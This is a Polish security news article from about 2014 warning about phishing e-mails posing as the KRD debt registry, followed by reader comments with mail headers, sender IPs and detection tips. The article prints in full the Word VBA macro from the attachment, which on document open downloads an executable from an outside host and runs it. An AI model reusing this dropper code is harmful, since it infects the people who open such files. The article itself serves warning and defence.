11:13
1/10/2014

Scam z fałszywymi i zainfekowanymi fakturami zmienił się w fałszywe raporty z KRD — także zawierające złośliwy dokument Worda jako załącznik.

Od wczoraj otrzymujemy od Was informacje o e-mailach, jakie dostajecie rzekomo z KRD (adres no-reply@krd.pl). Tak wygląda wiadomość:

Od: Krajowy Rejestr Dlugów
Data: 30 września 2014 00:21
Temat: Powiadomienie o wciagnieciu Twojej firmy na liste dluzników KRD
Do: TWOJ-NUMER-NIP

Powiadomienie o wciagnieciu na liste dluzników KRD.
Szanowni Panstwo,
Wiadomosc ta zostala wyslana automatycznie przez system powiadamiajacy Krajowego Rejestru Dlugów.
Uprzejmie informujemy iz w dniu 29.09.2014, firma:

$DANE_TWOJEJ_FIRMY

zostala wciagnieta na liste firm zadlózonych KRD. Szczególowe dane na temat powodów oraz skutków wciagniecia na liste dlózników znajdziesz w zalaczonym Raporcie.

Nadawca wiadomosci jest :
Krajowy Rejestr Dlugów Biuro Informacji Gospodarczej SA
ul. Armii Ludowej 21, 51-214 Wroclaw, spólka zarejestrowana w Sadzie Rejonowym dla Wroclawia-Fabrycznej,VI Wydzial Gospodarczy; KRS: 0000169851; NIP: 8951794707; kapital zalozycielski: 4.000.000 zl, wplacony w calosci

UWAGA: Wiadomosc zostala wygenerowania automatycznie, prosimy na nia nie odpowiadac.
W przypadku pytan lub watpliwosci, prosimy o kontakt na naszej stronie internetowej.

Wiadomosc przeznaczona jest wylacznie dla jej zamierzonego adresata i moze zawierac informacje zastrzezone i prawnie chronione. Jezeli otrzymales ja przez pomylke, prosimy o poinformowanie nas o tym fakcie za pomoca formularza kontaktowego.

Wiadomość (prawie napisana poprawną polszczyzną) i zwierająca poprawne dane firmy zachęca do otworzenia zainfekowanego załącznika (wspomniany w treści e-maila “Raport”), który jest plikiem Worda i zawiera złośliwe makro:


Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
(ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Sub AutoOpen()
URL$ = "hxxp://directxex.net/186dbd5b7195643e"
WHERE = Environ("Temp") & "\" & Pwd(5) & ".exe"
DownloadStatus = URLDownloadToFile(0, URL, WHERE, 0, 0)
Shell WHERE, vbNormalFocus
End Sub
Sub Document_Open()
End Sub
Function Pwd(iLength As Integer) As String
Dim i As Integer, iTemp As Integer, bOK As Boolean, strTemp As String
For i = 1 To iLength
Do
iTemp = Int((122 - 48 + 1) * Rnd + 48)
Select Case iTemp
Case 48 To 57, 65 To 90, 97 To 122: bOK = True
Case Else: bOK = False
End Select
Loop Until bOK = True
bOK = False
strTemp = strTemp & Chr(iTemp)
Next i
Pwd = strTemp
End Function

Tuż po ataku, złośliwy załącznik był wykrywany przez zaledwie kilka antywirusów. Dziś jest już lepiej, ale dalej ze znanych antywirusów, tylko kilka wykrywa plik .doc będący dropperem wirusa jako złośliwy:

E-maile były rozsyłane z kilku serwerów hostowanych przez Netart.

Jak pracownicy reagują na atak?

Przeczytajcie informacje od jednego z naszych czytelników:

W ramach polityki edukacji użytkowników wspomnieliśmy o takich mailach więc (pracowniczki) nas wezwały gdy tylko zobaczyły komunikat o makrach (bardzo dobrze, bardzo źle że otworzyły załącznik).

Inne z forwardowanych do nas e-maili, miały w historii zdania typu:

“Informatyku nasz firmowy, sprawdź czy możesz to otworzyć, bo ja nie”

KRD wie o tym incydencie

Otrzymaliśmy także oświadczenie KRD w sprawie e-maili:

(…) ta wiadomość nie została wysłana przez Krajowy Rejestr Długów Biuro Informacji Gospodarczej SA, a załącznik zawiera najprawdopodobniej szkodliwe oprogramowanie pozwalające na przejęcie kontroli nad komputerem. Zalecamy skasowanie e-maila bez otwierania załącznika. Jeśli ktoś otworzył załącznik, sugerujemy przeskanowanie komputera najnowszą wersją programu antywirusowego.

Krajowy Rejestr Długów Biuro Informacji Gospodarczej SA nie wysyła e-mailem raportów z informacjami o zadłużeniu, nie używa też w korespondencji załączników w formacie word. W razie dodatkowych pytań i wątpliwości prosimy kontakt z Zespołem Administratorów Bezpieczeństwa Informacji pod adresem e-mail abuse@krd.pl

Wnioskując po konstrukcji pola “To:”, atakujący korzysta z bazy firm, być może działalności gospodarczych. Czy ktoś z Was może potwierdzić, że dane na jakie otrzymał niniejszą wiadomość to dane dostępne w CEIDG?

PS. Dziękujemy 38 czytelnikom, którzy poinformowali nas o tej sprawie.

Przeczytaj także:

60 komentarzy

Dodaj komentarz
  1. “Wiadomość (prawie napisana poprawną polszczyzną)”
    “Prawie napisana” czy “prawie poprawną polszczyzną” ?

    • No tak, po co nam logika. ‘Prawie napisana wiadomość’ to definitywnie poprawna konstrukcja która po przeczytaniu brzmi `prawie sensownie’.

  2. Na 99% mogę potwierdzić, że nie są to dane z CEIGD. Otrzymałem tą wiadomość na mail podany w pf.pl

  3. Dane z maila KRD *nie zgadzaja sie* z wpisami z CEIDG. Dodatkowo dane mojej firmy wygladaly dziwnie, Numer NIP mial literowke – byl dluzszy o jedna cyfre niz prawidlowy. Reczna robota?

  4. Ja jestem tylko ciekaw jak oni to robią że ten plik jest niewykrywalny i co najważniejsze ilu ludzi to otworzyło bo jak to mówią głupi się zawsze znajdzie :)

  5. A sprawdzaliście pole autor w meta-tagach?

  6. Fajnie. Mój szef na szczęście nigdy nie otwiera “śmierdzących” załączników. Mail, który dostaliśmy wczoraj (taki sam) miał rażące błędy ortograficzne w postaci słowa “dłóg” w różnych odmianach więc od razu prześwietliłem ten plik i to samo znalazłem.
    Co ciekawe mail w polu From: miał adres konkretnie jakiegoś biura rachunkowego więc faktycznie można się było “łatwiej” nabrać – chociaż biuro z jakiejś pipiduwy.

    • Przyczepiłeś się użycia o z kreską a sam napisałeś pipidUwy…

  7. Gdyby nie kosmiczne terminy płatności w Polsce to pewnie ponad połowa “firemek” figurowała by w KRD ;)

  8. Zarejestrowany tylko w KRS a też dostałem

  9. Pierwszy raz się cieszę, że OpenOffice nie odpala officowych makr. Wczoraj to dostałem na prywatny e-mail z danymi firmy o której pierwszy raz się z maila dowiedziałem no i z ciekawości odpaliłem.

    • no i w ten sposób sam wystawiłeś świadectwo o swojej g…..

  10. Niedawno również założyłem firmę i tych śmieci dostaję pełno. Ale najlepsze jest to, jak mnie zaskoczył wczorajszy SMS od firmy ubezpieczeniowej:
    “PROAMA: W wymaganym teminie nie wplynela skladka za polise. Prosimy o natychmiastowa wplate 252,95 zl na nr 82 1840 …. ..19.”. Niezwłocznie do nich zadzwoniłem, bo nigdy nie miałem z tą firmą do czynienia i opowiedziałem o sprawie, a pani na infolinii powiedziała, że mój numer jest przypisany do innej osoby, widocznie nastąpiła jakaś pomyłka i mam zignorować tego SMS, a numer został już usunięty. Teraz pytanie – jak ktoś nie płaci, to może w taki łatwy sposób się wypisać z listy “subskrypcji telefonicznej”, albo to jakiś przekręt na większą skalę z PROAMA, aby pomóc spłacać długi :). Swoją drogą ciekawy sposób na wyłudzenie pieniędzy…

  11. Złapało też znajomą fundację(wpisaną w KRS), a wiec niekoniecznie idzie po wpisie z Ceidg.

  12. ja dostałem coś takiego:
    Received-SPF: none (google.com: biuro@projektlokale.pl does not designate permitted sender hosts) client-ip=77.55.81.142;
    Received: from [192.168.31.1] (unknown [94.242.57.172])
    by electrotech.nazwa.pl (Postfix) with ESMTP id EF61711D83BA
    for ; Tue, 30 Sep 2014 23:34:45 +0200 (CEST)

    gmail to wrzucił do spamu.

  13. Aaaaha… poprawna prawie polszczyzna, przygania prawie poprawnej polszczyźnie i nawet nie potrafi zakumać, że sama poprawną nie jest. Świetna robota Panie Moderatorze :) OMG Świetlana przyszłość Wasza :D Szkoda na Was czasu.

    • No tak się czepiacie, ale żeby aż taka afera? Ta strona się nazywa niebezpiecznik a nie “polszczyźnik” albo “miodek”

    • Grammar nazi trole nie śpią.

    • no, ale skoro sami rozpoczęli wątek poprawnej polszczyzny, to trudno się dziwić

  14. U mnie w firmie wiadomości przyszły na prawie wszystkie skrzynki pocztowe, również imienne, których adresów nigdzie nie ujawnialiśmy. Oprócz KRD w ostatnim czasie były również prośby o wypełnienie druku reklamacyjnego, informacje o problemie z dostarczeniem przesyłki przez kuriera, przesyłce pobraniowej i wiele podobnych. Od około miesiąca trafia do mnie nawet kilkanaście dziennie.

    • Zmień dostawcę usług hostingowych który ma porządną ochronę antyspamową.

  15. Mail oczywiście przyszedł, dane firmy (nazwa, regon) poprawne; maila z miejsca wykasowałem (tak jak poprzednie o nieopłaconych fakturach z plusa, przeterminowanym zadłużeniu itp.). Przestępcy robią się coraz lepsi (w sensie, że coraz gorsi), bo już rzadko kiedy jakiś dobry prawnik ś.p. bogatego przedsiębiorcy z Nigerii chce mi przelać kasę, a teraz jej żądają za lipne faktury wystawione z prawidłowymi danymi…

  16. “Wiadomość (prawie napisana poprawną polszczyzną) i zwierająca”
    ironia losu :P

  17. czy clamav to rozpoznaje, czy musze wyciac .doc w eximie?

    • Nie, nie rozpoznaje nawet z clamav-unofficial-sigs – dodaj sygnaturę i profilaktycznie tnij regexpem po urlach do liczników (jeden z UPC) z części html maila.

      ‘Mailing’ szedł do wczoraj z 37.59.179.12 via adm46.rev.netart.pl oraz acm52.rev.netart.pl – arbuzy i postmasterzy jak zwykle (to nie pierwszy w tym roku przypadek długotrwałego ‘mailingu’ od/przez nich) olewają zgłoszenia – dzisiaj zdaje się (na razie 1 mail) jest już nowy host.

  18. wciagnieciu ,liste ,dluzników ,Wiadomosc ,powiadamiajacy ,zadlózonych ,dlózników i.t.d.
    Czy powyżej ktoś napisał – “…Wiadomość (prawie napisana poprawną polszczyzną)…”?
    Ile wynosi to “prawie”?
    To “prawie” to dramatyczne zaniżenie standartów poprawnej polszczyzny!
    Litości!

    • Standardów

  19. Od wczoraj chodzi kilka mutacji tego pliku, w sumie różnią się tylko tym do czego i gdzie zapisują plik exe i sposobem jego pobrania.

  20. Gdy rejestrujesz firmę nie podajesz adresu email do kontaktowania się z Tobą = nie ma spam.
    W czym problem? Nie ma przecież obowiązku posiadania/podawania adresu email:)

  21. Jesli ktoś pisze ‘dłÓżników’ z takim bykiem ortograficznym to od razu wzbudza moje podejrzenia.

  22. Możesz ktoś podrzucić sample exe ?

  23. U nas poza Kaspersky’m, który blokuje URL, “level niżej” FW od Palo Alto też zablokował ten URL:

    “Web Page Blocked

    Access to the web page you were trying to visit has been blocked in accordance with company policy. Please contact your system administrator if you believe this is in error.

    User: xxx\xxx

    URL: s1.directxex.net/

    Category: malware-sites”

    Także spoko. :)

  24. Ale z tym makrem w .doc to trzeba przyznać, że dość oryginalne posunięcie ;)

  25. Jak dla mnie to dane z bazy http://stat.gov.pl/regon/. W CEIDG są tylko osoby fizyczne, w KRS głównie prawne, REGON z kolei ma wszystkich :)

    • Większość danych była prawidłowa – w jednym były dane nowo-założonej DG z dopiskiem “[ W LIKWIDACJI ]” zaś w innym nazwa strony www a NIP i REGON z 2 różnych, niezwiązanych, firm.

    • Hmm….. coś jak “pomieszane” przelewy w mBanku swego czasu? :D

  26. Ciekawszym jest to co dzieje się potem…od .doc po zdalny dostęp do OS i malware’u wykradającego hasła (niestety do czego hasła nie udało się ustalić:(

    Twórcy tego (przyznam) ciekawego phishingu nadawali z 37.59.179.12..nawet pozostając przez chwilę dostępnym na RDP, ale już zwinęli “business” ;)…przynajmniej z tego IP.

    I raczej nie należy się sugerować “szczegóły pliku” i autor:
    https://www.virustotal.com/pl/file/0e31dc6b7bb2e09d0e52d948865882b5e03b6276fa21410d494bbb50e7dc5cbd/analysis/1412145221/

    Po zignorowaniu komunikatu o makrach do OS zasysany był:
    https://www.virustotal.com/pl/file/2f224b2628731a596abd4b49fd4d34708cff4dc4818b72f1d5213c56d62d9e24/analysis/

    ..więc polecę zmianę haseł dla tych, którym się przytrafiło ;(

    • Mam te sam adres, to jakiś z puli OVH.
      Adresy nadawców wyglądają na przypadkowe ale widzę zbieżność że przechodzi to przez serwery NetArt/Nazwa

      Received: from adm46.rev.netart.pl ([77.55.90.46]:55190)
      […]
      (envelope-from )
      […]
      Received: from [37.59.179.12] (unknown [37.59.179.12])
      by acnpartner.nazwa.pl (Postfix) with ESMTP id 9CAB7116A0AD
      […]

  27. Teraz jest nowa edycja tej akcji – podszywają się pod firmę Play. Wysyłka następuje z adresu: awizo@mojefinanseplay.pl Wiadomość zawiera załącznik zachęcający do włączenia makra

  28. U nas też przyszło niby z Play.
    Co ciekawe w samym pliku doc na razie tylko 2 silniki wykrywają złośliwe makro.
    https://www.virustotal.com/pl/file/d7d8aae4f753e8cb1b1832e8e84f64b4a78c900861eb5ce7ec00bb006f357a78/analysis/
    Mam Node32 i też nic nie wykrył.
    Ale już przy próbie ściągnięcia exe antywirus się połapał i zablokował plik.

  29. wwwandal: cos nie tak z tymi twoimi linkami.

    • :) linki mają się dobrze
      @ Wojciech wystaw gdzieś ten E-Faktura_F20249758_09_14.doc zobaczymy gdzie się “chłopaki” przenieśli :)

  30. Dobrze, że sprzęt ratuje genialne umysły typu … ” chlopaki nie moge otworzyc zalacznika” ;-)

  31. Hmmm, moja mama dostała taki plik, przeglądam go HexEditorem i widzę “User Marcin Kosedowski” – z Wrocławia

    Ciekawe, czy informacja uzupełniona celowo, czy ktoś zapomniał usunąć

  32. Podawajcie tu linki skąd ściągany jest ten exec.

  33. ok, widzę na blogu tego pana, że nie ma z tym nic wspólnego

  34. Huehue z Visual Basicem skończyłem dobre kilka lat temu. Była to jeszcze przed .NETowa wersja 6.0 i mówiąc szczerze nie spodziewałem się, że jeszcze ujrzę te tragiczną składnię:
    Sub NazwaFunkcji
    End Sub
    Kiedyś kumpel powiedział mi: Jak to jest w ogóle zrozumiałe dla normalnego programisty… Teraz z perspektywy czasu i setek tysięcy linii napisanych w JS sam się nad tym zastanawiam :D
    P.S.: Wiem JS to też nie wyznacznik, ale przynajmniej zawiera 2 znaki “{}” zamiast Sub i End Sub…

    Stwierdzam również, że jedyna rzecz,która Microsoftowi wyszła perfekcyjnie, to przekonanie użytkowników, że bez Okien nie da się żyć i to najważnieszy system w kosmosie – sam jestem jednym z ich Okiennych niewolników -.- (chociaż spokojnie – pingwina też nie oszczędzam :D )

  35. Kilkanaście dni temu otrzymaliśmy podobny mail, z tym że rzekomym nadawcą był Inpost a w pliku MSWord miały być dane do odbioru e-przesyłki. Wygląd dokumentu prawie identyczny, z obowiązkowym zdaniem o odblokowaniu makr w celu pobrania danych z serwera :P. Exec wirusa był pobierany ze strony szkoły nauki jazdy ze Śląska.

    • A dokładnie z automotoszkolenia.pl

      Bardzo też nie lubią niejakiego “Marcina Kosedowskiego” :)

  36. Troszkę nowsza odmiana KRD też nieźle się kryje przed skanerami:
    https://www.virustotal.com/pl/file/ee3032a37a60b68769fd55eb0aa3eae1a33bd165c5e088f9c84c8e22c21b8130/analysis/

  37. Makro jest publicznie dostępne w sieci, więc po raz koleny ten skid się nie popisał.

    Pewnie teraz czyta nasze komentarze i się onanizuje…

  38. czy samo posiadanie linuxa chroni przed takim atakiem?

  39. Nie podpuszczaj ludzi .Czy język programowanie C C++ oraz inne są bez błędów .Nie
    Nie Linux cię nie uchroni .

    Człowiek to wymyślił i człowiek morze to zniszczyć.

    • co proszę?

  40. Otrzymaliśmy takiego maila. Dane kontaktowe oraz dane firmy były dokładnie takie same jak w CEIDG. Kopiuj+wklej

    Pozdrawiam

  41. Smród jaki ciągnie się za firma KRD jest taki, że potraktowałem ten mail jako ich akcje “marketingową”. No bo jak traktować firmę, która dzwoni i przedstawia się “Jestem opiekunem Pana firmy …” i próbuje w ten sposób łapać klienta na usługi o podłej jakości.

  42. Uważajcie również na takie maile:
    ——————————————-
    From: Sekretariat
    Subject: Odp:dokument nr 5163
    Date: Wed, 8 Oct 2014 09:26:30 +0000
    Attachment: Sprawozdanie finansowe – dokument
    ——————————————-
    Jest to malware SmokeLoader. Ta mutacja jest jeszcze słabo wykrywana:
    https://www.virustotal.com/en/file/be623f49d0cfea784bd86b7660e88c4f187c109c410bbf5e89afc28a9f833055/analysis/

  43. […] przez atakujących wiadomości posiadały załączniki, które zawierały makra w Visual Basicu (brzmi znajomo?). Po uruchomieniu, makra te generowały wyskakujące okienko o takim […]

  44. 11.02.2015r. – dzisiaj do firmy , w której pracuję wpłynął e’mail dot. wciągnięcia na listę dłużników. E’mail nadany został z adresu no-reply@krd.pl i zawiera nawet logo Krajowego Rejestru Dłużników.

  45. Też rano dostaliśmy. Plik scr spakowany podwójnie zipem. Przy czym drugi raz jest spakowane hasłem, żeby antywirus w tym nie dał rady grzebnąć. Hasło oczywiście jest w mailu.

Twój komentarz

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.